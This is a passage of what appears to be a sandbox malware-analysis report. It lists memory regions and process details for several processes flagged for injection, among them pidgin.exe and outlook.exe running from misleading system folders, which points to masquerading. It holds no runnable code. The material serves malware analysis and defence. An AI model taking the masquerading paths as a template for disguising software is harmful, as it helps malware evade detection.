0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2065 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2066 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2067 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2068 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2069 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2071 start_va = 0xcd0000 end_va = 0xe15fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Thread: id = 116 os_tid = 0x1140 Process: id = "18" image_name = "scriptftp.exe" filename = "c:\\program files\\windows multimedia platform\\scriptftp.exe" page_root = "0x5fac3000" os_pid = "0x1144" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Windows Multimedia Platform\\scriptftp.exe\" " cur_dir = "C:\\Program Files\\Windows Multimedia Platform\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2072 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2073 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2074 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2075 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2076 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2077 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2078 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2079 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2080 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2081 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2082 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2083 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2084 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2085 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2086 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2087 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2088 start_va = 0x8a0000 end_va = 0xa27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 2089 start_va = 0xa30000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 2090 start_va = 0xc00000 end_va = 0xc16fff monitored = 0 entry_point = 0xc014a1 region_type = mapped_file name = "scriptftp.exe" filename = "\\Program Files\\Windows Multimedia Platform\\scriptftp.exe" (normalized: "c:\\program files\\windows multimedia platform\\scriptftp.exe") Region: id = 2091 start_va = 0xc20000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 2092 start_va = 0x2020000 end_va = 0x20dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 2093 start_va = 0x21d0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 2094 start_va = 0x21e0000 end_va = 0x2ba3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021e0000" filename = "" Region: id = 2095 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2096 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2097 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2098 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2099 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2100 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2101 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2102 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2103 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2104 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2105 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2106 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2107 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2108 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2109 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2110 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2111 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2112 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2113 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2114 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2115 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2116 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2117 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2118 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2119 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2120 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2123 start_va = 0x5b0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Thread: id = 117 os_tid = 0x1148 Process: id = "19" image_name = "pidgin.exe" filename = "c:\\program files (x86)\\internet explorer\\pidgin.exe" page_root = "0x602cd000" os_pid = "0x1154" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\pidgin.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2124 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2125 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2126 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2127 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2128 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2129 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2130 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2131 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2132 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2133 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2134 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2135 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2136 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2137 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2138 start_va = 0x500000 end_va = 0x5bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2139 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2140 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2141 start_va = 0x8a0000 end_va = 0xa27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 2142 start_va = 0xa30000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 2143 start_va = 0xd90000 end_va = 0xd9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 2144 start_va = 0x1390000 end_va = 0x13a6fff monitored = 0 entry_point = 0x13914a1 region_type = mapped_file name = "pidgin.exe" filename = "\\Program Files (x86)\\Internet Explorer\\pidgin.exe" (normalized: "c:\\program files (x86)\\internet explorer\\pidgin.exe") Region: id = 2145 start_va = 0x13b0000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 2146 start_va = 0x27b0000 end_va = 0x3173fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027b0000" filename = "" Region: id = 2147 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2148 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2149 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2150 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2151 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2152 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2153 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2154 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2155 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2156 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2157 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2158 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2159 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2160 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2161 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2162 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2163 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2164 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2165 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2166 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2167 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2168 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2169 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2170 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2171 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2172 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2174 start_va = 0x5e0000 end_va = 0x6acfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Thread: id = 118 os_tid = 0x1158 Process: id = "20" image_name = "outlook.exe" filename = "c:\\program files\\windows media player\\outlook.exe" page_root = "0x796d7000" os_pid = "0x115c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Windows Media Player\\outlook.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2175 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2176 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2177 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2178 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2179 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2180 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2181 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2182 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2183 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2184 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2185 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2186 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2187 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2188 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2189 start_va = 0x5d0000 end_va = 0x68dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2190 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2191 start_va = 0x990000 end_va = 0x9a6fff monitored = 0 entry_point = 0x9914a1 region_type = mapped_file name = "outlook.exe" filename = "\\Program Files\\Windows Media Player\\outlook.exe" (normalized: "c:\\program files\\windows media player\\outlook.exe") Region: id = 2192 start_va = 0x9b0000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 2193 start_va = 0xb40000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 2194 start_va = 0x1f40000 end_va = 0x1ffbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 2195 start_va = 0x2060000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 2196 start_va = 0x2260000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 2197 start_va = 0x2270000 end_va = 0x2c33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 2198 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2199 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2200 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2201 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2202 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2203 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2204 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = 